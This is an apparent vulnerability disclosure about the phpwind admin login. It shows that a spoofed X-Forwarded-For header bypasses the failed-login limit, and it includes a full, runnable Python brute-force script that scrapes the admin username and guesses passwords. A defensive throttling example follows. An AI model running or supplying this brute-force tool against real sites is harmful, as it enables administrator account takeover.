Phpwind background account password can be cracked and verification code can be ignored

Source: Internet
Author: User


 

Let's take a look at the official website.

http://www.phpwind.net/admin.php
 



A verification code is present here.



Then let's take a look at:

http://www.phpwind.net/windid/admin.php
 



The verification code is missing.







Then I set up phpwind on a virtual machine (the verification code is disabled by default).
 


 



http://192.168.1.117/windid/admin.php

No verification code.

Then log in with the account and password at this URL.

After a successful login, open http://192.168.1.117/admin.php

It is also in the logged-in state.



However, with straightforward brute forcing, an error is shown after eight failed attempts.
 



However, testing shows that the X-Forwarded-For (XFF) header is used to determine the source IP address.

So the limit can be bypassed by modifying XFF on each attempt.



To crack the password, you must know the account name.

There are many ways to obtain the administrator account. Here is a simple one.

It can be read from the personal space page. (This method will not work if this id has been deleted.)

http://192.168.1.117/index.php?m=space&uid=1
 

 

 

The brute-force cracking program code is as follows:
 

<poc>
# coding: utf-8
import httplib, re, random, urllib, time
from sys import argv

# crack: send one login attempt with a random X-Forwarded-For value
def getHtml(host, username, password):
    ip = str(random.randint(1, 100)) + "." + str(random.randint(100, 244)) + "." + str(random.randint(100, 244)) + "." + str(random.randint(100, 244))
    postHead = {"Host": host,
                "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
                "X-Forwarded-For": ip,
                'content-type': 'application/x-www-form-urlencoded',
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'connection': 'keep-alive',
                'Cookie': 'csrf_token=wooyun'}
    postContent = 'username=' + username + '&password=' + password + '&submit=&csrf_token=wooyun'
    resultHtml = httplib.HTTPConnection(host, 80, False)
    resultHtml.request('POST', '/windid/admin.php?a=login', body=postContent, headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect

# Get the username from the personal space page of uid=1
def getusername(host):
    url = 'http://' + host + '/index.php?m=space&uid=1'
    pageContent = urllib.urlopen(url).read()
    r1 = re.compile('">(\S{1,30}) personal space</a>')
    username = r1.findall(pageContent)[0]
    return username

# obtain the host, dictionary file and interval through argv for blasting
if (len(argv) == 1):
    print '----> python ' + argv[0] + ' host address dictionary file interval'
    print '----> python ' + argv[0] + ' 192.168.1.105 pass.txt 0.2'
else:
    host = argv[1]
    passfile = argv[2]
    sleeptime = argv[3]
    print 'website host is ' + host
    print 'The password dictionary is ' + passfile
    print 'The interval is ' + sleeptime
    print '--->'
    username = getusername(host)
    f = open(passfile, 'r')
    htmlpass = f.read().split('\r\n')
    f.close()
    # username-derived candidates are tried before the dictionary entries
    userpass = [username + '000000', username + '000000', username + username, username + '..', username + '.', username + 'admin888', username + 'admin123', username + 'admin', username + '000000']
    htmlpass = userpass + htmlpass
    for i in range(len(htmlpass)):
        time.sleep(float(sleeptime))
        print 'attempt password ' + htmlpass[i]
        # an empty response body is treated as a successful login
        if (getHtml(host, username, htmlpass[i]) == ''):
            print 'account is ' + username
            print 'password is ' + htmlpass[i]
            break
</poc>



Demo
 




 





The following are several cases



 


 

 

 

Solution:

Enhanced verification
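
As an added illustration of the fix (not phpwind's code and not part of the original post), the Python example below contrasts a failed-login counter keyed on the client-supplied X-Forwarded-For value with one keyed on the TCP peer address, and adds a per-account counter. The trusted-proxy range, the function names and all sample addresses are assumptions constructed for the example.

```python
import ipaddress
from collections import defaultdict

MAX_FAILURES = 8  # the page reports an error at eight failed attempts
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed: your own reverse proxies

def weak_client_key(peer_ip, headers):
    """Behaviour described on the page: a client-supplied header decides the source IP."""
    return headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()

def hardened_client_key(peer_ip, headers):
    """Use the TCP peer address; honour X-Forwarded-For only when a trusted proxy set it."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For")
    if xff and any(peer in net for net in TRUSTED_PROXIES):
        # The right-most entry is the one appended by our own proxy.
        candidate = xff.split(",")[-1].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            pass  # malformed header: fall back to the peer address
    return str(peer)

class LoginThrottle:
    """Counts failed logins per client key and, optionally, per account."""

    def __init__(self, key_func, per_account=False):
        self.key_func = key_func
        self.per_account = per_account
        self.by_client = defaultdict(int)
        self.by_account = defaultdict(int)

    def allowed(self, peer_ip, headers, username):
        if self.by_client[self.key_func(peer_ip, headers)] >= MAX_FAILURES:
            return False
        return not (self.per_account and self.by_account[username] >= MAX_FAILURES)

    def record_failure(self, peer_ip, headers, username):
        self.by_client[self.key_func(peer_ip, headers)] += 1
        self.by_account[username] += 1

def blocked_after(throttle, attempts, peer_ip="203.0.113.7"):
    """Replay failed logins carrying a different constructed X-Forwarded-For each time."""
    for i in range(attempts):
        headers = {"X-Forwarded-For": "198.51.100.%d" % (i % 250 + 1)}
        if not throttle.allowed(peer_ip, headers, "admin"):
            return i  # attempts that got through before the block
        throttle.record_failure(peer_ip, headers, "admin")
    return None  # never blocked
```

A per-account counter should trigger a verification code or a delay rather than a hard lock, since a hard lock lets anyone lock the administrator out.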

 
